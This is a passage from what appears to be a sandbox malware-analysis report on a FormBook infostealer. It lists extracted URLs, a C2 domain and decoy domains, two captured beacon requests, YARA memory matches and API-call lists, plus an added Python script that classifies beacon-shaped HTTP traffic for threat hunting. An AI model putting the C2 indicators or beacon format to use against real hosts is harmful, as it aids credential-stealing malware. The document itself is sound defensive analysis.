• http://www.sajatypeworks.com; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.sakkal.com; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.sandoll.co.kr; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.tiro.com; explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.typography.netD; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.urwpp.deDPlease; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• http://www.zhongyicts.com.cn; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmp
• https://dist.nuget.org/win-x86-commandline/latest/nuget.exe; nova narud#U017eba pdf rvP6N.exe (file)
• https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip; nova narud#U017eba pdf rvP6N.exe (file)
• https://github.com/d-haxton/HaxtonBot/archive/master.zip; nova narud#U017eba pdf rvP6N.exe (file)
• https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css; nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.247192769.0000000002C60000.00000004.00000001.sdmp

Most of these are font-vendor URLs from font resources, present in the memory of explorer.exe as well as the sample, and are not network indicators; the only observed traffic is the two GET requests and the DNS query listed above. The three nuget/github URLs are in the sample file itself rather than in a memory dump.
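The configuration lists one C2 entry, www.lovetarot.online/sqxs/, and 64 decoy domains, yet both GET requests the sandbox captured went to www.magentos6.com and www.businesshouse5asidejm.com, which are decoy-list entries; the 404 above is what an unrelated web server answers for /sqxs/. Blocking only the configured C2 host therefore misses the beacons. What persists across hosts is the path /sqxs/ and the query shape: a long base64-shaped first parameter, a short second parameter that is identical in both requests, and no User-Agent header (the "HTTP GET or POST without a user agent" signature above). The following added example, not part of the Joe Sandbox report, classifies HTTP requests against the configuration on that basis. CONFIG carries the C2 entry and a subset of the decoy list; the request texts are constructed from the two captured GETs plus one benign request for contrast; the base64-shape check is a heuristic of mine, not a claim about FormBook's encoding.

```python
"""Classify HTTP requests against the FormBook configuration extracted above.

Added example, not part of the Joe Sandbox report. CONFIG reproduces the C2
entry and a subset of the decoy list; REQUESTS is constructed from the two
captured GET requests plus one benign request.
"""
import re
from urllib.parse import urlsplit

CONFIG = {
    "C2 list": ["www.lovetarot.online/sqxs/"],
    "decoy": ["creid-network.com", "magentos6.com", "businesshouse5asidejm.com", "michaels.house"],  # subset
}

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, host, path, params, headers).

    The query is split by hand: urllib's parse_qs would turn the '+' inside
    the first parameter into a space and break the base64-shape check.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = [tuple(kv.split("=", 1)) if "=" in kv else (kv, "") for kv in query.split("&") if kv]
    return method, headers.get("host", "").lower(), path, params, headers


def config_hosts(config):
    """Derive the C2 hostnames, C2 paths and decoy set from an extracted config."""
    c2 = {urlsplit("http://" + e).hostname for e in config["C2 list"]}
    paths = {urlsplit("http://" + e).path for e in config["C2 list"]}
    decoys = {d.lower() for d in config["decoy"]}
    return c2, paths, decoys


def classify(raw: str, config=CONFIG):
    method, host, path, params, headers = parse_request(raw)
    c2, paths, decoys = config_hosts(config)
    apex = host[4:] if host.startswith("www.") else host
    if host in c2 or apex in c2:
        role = "c2"
    elif host in decoys or apex in decoys:
        role = "decoy"
    else:
        role = "other"

    def looks_b64(v: str) -> bool:          # heuristic: base64 alphabet, length multiple of 4
        return bool(B64_RE.fullmatch(v)) and len(v) % 4 == 0

    # Beacon shape: GET to a configured C2 path with exactly two parameters, the first
    # base64-shaped, regardless of which domain in the rotation receives it.
    beacon = method == "GET" and path in paths and len(params) == 2 and looks_b64(params[0][1])
    return {
        "host": host,
        "role": role,
        "path": path,
        "no_user_agent": "user-agent" not in headers,
        "beacon": beacon,
    }


REQUESTS = [
    "GET /sqxs/?9r=MRpl8UDFdJqnpJCoHCjX+0bMpbzGGukG+UMXxre6C1KfRpZnCXnM0uJ6ixOsqKWJKMs9S6HgiQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1\r\n"
    "Host: www.magentos6.com\r\nConnection: close\r\n\r\n",
    "GET /sqxs/?9r=vISvmTlEiopKSz7sbFBAxkFCF8r7k2dJAG7u5uLq0h9VZPMRNv+QYXnwEIKYsgNdKjl1RWh6mQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1\r\n"
    "Host: www.businesshouse5asidejm.com\r\nConnection: close\r\n\r\n",
    # constructed benign request for contrast
    "GET /sqxs/index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]


def beacon_hosts(requests=REQUESTS):
    """Hosts that received a beacon-shaped request, in order of appearance."""
    return [c["host"] for c in map(classify, requests) if c["beacon"]]


if __name__ == "__main__":
    for raw in REQUESTS:
        print(classify(raw))
```

For hunting in proxy logs, the productive pivot is the path plus the two-parameter shape, not the host: the host will be a different entry of the decoy list on every beacon, and the decoy owners' servers answer 404 exactly as seen above.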

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041A070 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041A120 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00419F40 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00419FF0 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041A09A NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041A11A NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00419F3A NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00419FEB NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012099A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012098F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012095D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012097A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012096E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209950 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012099D0 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209820 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0120B040 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012098A0 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209B00 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0120A3B0 NtGetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209A10 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209A80 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209520 NtWaitForSingleObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0120AD30 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209560 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012095F0 NtQueryInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209730 NtQueryVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0120A710 NtOpenProcessToken
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209760 NtOpenProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209770 NtSetInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0120A770 NtOpenThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209FE0 NtCreateMutant
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209610 NtEnumerateValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209670 NtQueryInformationProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_01209650 NtQueryValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_012096D0 NtCreateKey
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F96D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F95D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035FA770 NtOpenThread
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035FA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035FA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9560 NtWriteFile
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035FAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035FB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_035F98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_00B2A070 NtClose
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_00B29FF0 NtReadFile
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_00B29F40 NtCreateFile
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_00B2A09A NtReadFile
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_00B29FEB NtReadFile
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 15_2_00B29F3A NtCreateFile